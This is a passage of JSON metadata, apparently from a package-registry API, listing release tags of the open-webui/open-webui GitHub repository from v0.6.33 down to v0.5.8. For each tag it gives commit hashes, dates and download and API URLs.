i/open-webui/releases/tag/v0.6.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.33/manifests"},{"name":"v0.6.32","sha":"37d1c85c996e1bdcd505e1e6d62b2f17acd8df23","kind":"commit","published_at":"2025-09-29T06:13:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.32","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.32/manifests"},{"name":"v0.6.31","sha":"598282cf75de358215d045c617e70d28bc48929e","kind":"commit","published_at":"2025-09-25T20:28:06.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.31","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.31/manifests"},{"name":"v0.6.30","sha":"8920bf23774edd829e54e65b043864afb97bf2cf","kind":"commit","published_at":"2025-09-17T17:25:26.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.30","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.30/manifests"},{"name":"v0.6.29","sha":"dddd1e44f37e0b489d10abbc21667e16d62722f6","kind":"commit","published_at":"2025-09-17T16:32:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.29","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.29/manifests"},{"name":"v0.6.28","sha":"171021cfa4276f63fd9fd7f31fa0c904fb13c24c","kind":"commit","published_at":"2025-09-10T10:53:30.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.28","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.28/manifests"},{"name":"v0.6.27","sha":"918f507d8cdc652ae913b8596877a8a50b845114","kind":"commit","published_at":"2025-09-09T14:34:15.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.27","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.27/manifests"},{"name":"v0.6.26","sha":"2407d9b905978d68619bdce4021e424046ec8df9","kind":"commit","published_at":"2025-08-28T10:40:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.26","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.26/manifests"},{"name":"v0.6.25","sha":"1db8dec4f52fc0fa8f8f7bfbb8ea5bde41fee17d","kind":"commit","published_at":"2025-08-22T13:22:31.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.25","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.25/manifests"},{"name":"v0.6.24","sha":"2777bab1485aad097aa41c44a76f49be141eb061","kind":"commit","published_at":"2025-08-22T10:06:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.24","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.24/manifests"},{"name":"v0.6.23","sha":"407dc9a401fc2382df06d776dbd8ba95dffda38a","kind":"commit","published_at":"2025-08-21T18:21:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.23","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.23/manifests"},{"name":"v0.6.22","sha":"438e5d966f0f64f9ea3feab22724a5bd96a4127b","kind":"commit","published_at":"2025-08-11T13:15:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.22","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.22/manifests"},{"name":"v0.6.21","sha":"30d0f8b1f6cc45ac3ee7e05ccb5c849366680231","kind":"commit","published_at":"2025-08-10T13:39:57.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.21","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.21/manifests"},{"name":"v0.6.20","sha":"3f35ba27fc31500e2b1085f067371541becd5165","kind":"commit","published_at":"2025-08-09T22:59:14.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.20/manifests"},{"name":"v0.6.19","sha":"2c3655a9694fc3f9a428e5521f42a187901d8dc0","kind":"commit","published_at":"2025-08-09T22:38:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.19/manifests"},{"name":"v0.6.18","sha":"5fbfe2bdcadf5f157926f6551891e4dc0802b9f3","kind":"commit","published_at":"2025-07-19T19:26:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.18/manifests"},{"name":"v0.6.17","sha":"b249809d2dff7bc89394a61ee5f7e258b295623a","kind":"commit","published_at":"2025-07-19T17:39:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.17/manifests"},{"name":"v0.6.16","sha":"f966935d1da56a1f9f8691c1f62d68eecc0438fa","kind":"commit","published_at":"2025-07-14T17:39:26.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.16/manifests"},{"name":"v0.6.15","sha":"b5f4c85bb196c16a775802907aedd87366f58b0f","kind":"commit","published_at":"2025-06-16T14:34:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.15/manifests"},{"name":"v0.6.14","sha":"63256136ef8322210c01c2bb322097d1ccfb8c6f","kind":"commit","published_at":"2025-06-10T14:17:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.14/manifests"},{"name":"v0.6.13","sha":"53764fe64884da147359e54ed6d9607fe57f1600","kind":"commit","published_at":"2025-05-29T21:37:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.13/manifests"},{"name":"v0.6.12","sha":"ba0088f39b7a093920b142a5172554686f24df60","kind":"commit","published_at":"2025-05-28T23:59:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.12/manifests"},{"name":"v0.6.11","sha":"9faa4c6a4cd8dd643cddb93dccb65c6609488a29","kind":"commit","published_at":"2025-05-26T22:27:09.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.11/manifests"},{"name":"v0.6.10","sha":"e6afa69f59295d2930ff57285d0933e207d8e4c3","kind":"commit","published_at":"2025-05-19T01:34:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.10/manifests"},{"name":"v0.6.9","sha":"0cef844168e97b70de2abee4c076cc30ffec6193","kind":"commit","published_at":"2025-05-10T19:04:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"ef301aa16b84f9cbc0ece18539f9db80bff0f605","kind":"commit","published_at":"2025-05-10T15:31:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"a3bb7df61058e690a76cebb7681bd5390e77d226","kind":"commit","published_at":"2025-05-06T23:08:25.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"23b9354cf6575bfe82e67df0660128d5a92461fc","kind":"commit","published_at":"2025-05-05T13:58:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"07d8460126a686de9a99e2662d06106e22c3f6b6","kind":"commit","published_at":"2025-04-14T09:13:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.5/manifests"},{"name":"v0.6.4","sha":"aca37f592d0dedea2529fcb4304e4ff39e0c1219","kind":"commit","published_at":"2025-04-13T06:01:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.4/manifests"},{"name":"v0.6.3","sha":"8b0e565e2c8a8f47f54ef039eb132ddb756e83a6","kind":"commit","published_at":"2025-04-13T05:44:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.3/manifests"},{"name":"v0.6.2","sha":"63533c9e3ab41edd7bd4124ef94f6b6dc09aa175","kind":"commit","published_at":"2025-04-07T03:41:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.2/manifests"},{"name":"v0.6.1","sha":"da948351658602fb7870b3e8573ad2b6f1ace09e","kind":"commit","published_at":"2025-04-05T17:15:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.1/manifests"},{"name":"v0.6.0","sha":"04799f1f95f958674d35ba4854ef62754a4d332e","kind":"commit","published_at":"2025-04-01T01:47:18.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.0/manifests"},{"name":"v0.5.20","sha":"3b70cd64d7fa6902e8c79cf8dcbf3c7e84cf704b","kind":"commit","published_at":"2025-03-06T03:44:45.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.20/manifests"},{"name":"v0.5.19","sha":"1a51584fe02ba917e229f52367363ff783babd22","kind":"commit","published_at":"2025-03-05T06:22:20.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.19/manifests"},{"name":"v0.5.18","sha":"95cadaca72e676199caf894f40cc132d7c8416df","kind":"commit","published_at":"2025-02-27T20:00:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.18/manifests"},{"name":"v0.5.17","sha":"15485e7c5d2c09857acce10e311707e2bb8e86c9","kind":"commit","published_at":"2025-02-27T11:46:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.17/manifests"},{"name":"v0.5.16","sha":"6fedd72e3973e1d13c9daf540350cd822826bf27","kind":"commit","published_at":"2025-02-20T19:26:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.16/manifests"},{"name":"v0.5.15","sha":"9fdf2cd16c38d1711616925e852f17cac865d5fe","kind":"commit","published_at":"2025-02-20T10:01:29.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.15/manifests"},{"name":"v0.5.14","sha":"3f3a5bb0ab8ce3425f317f1e57b084523aa2b2a5","kind":"commit","published_at":"2025-02-18T05:48:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.14/manifests"},{"name":"v0.5.13","sha":"e4c9734fcba5105c30de874fd4c21c602dbd08a6","kind":"commit","published_at":"2025-02-18T04:36:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.13/manifests"},{"name":"v0.5.12","sha":"2017856791b666fac5f1c2f80a3bc7916439438b","kind":"commit","published_at":"2025-02-14T07:12:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.12/manifests"},{"name":"v0.5.11","sha":"4d667e447d0ae09e7723b979a699d0e85806552b","kind":"commit","published_at":"2025-02-13T10:06:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.11/manifests"},{"name":"v0.5.10","sha":"e9d6ada25cd6ce84be067ba794af4c9d7116edc7","kind":"commit","published_at":"2025-02-05T22:46:41.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.10/manifests"},{"name":"v0.5.9","sha":"ab94468ffa765c9ed169cff3a7caa18e85f434db","kind":"commit","published_at":"2025-02-05T10:38:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.9/manifests"},{"name":"v0.5.8","sha":"dc3b2f1f1e60dadfe6ca22e208b0f00d36f6a0f1","kind":"commit","published_at":"2025-02-05T09:16:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.8","html_url":"https://github.com/open-web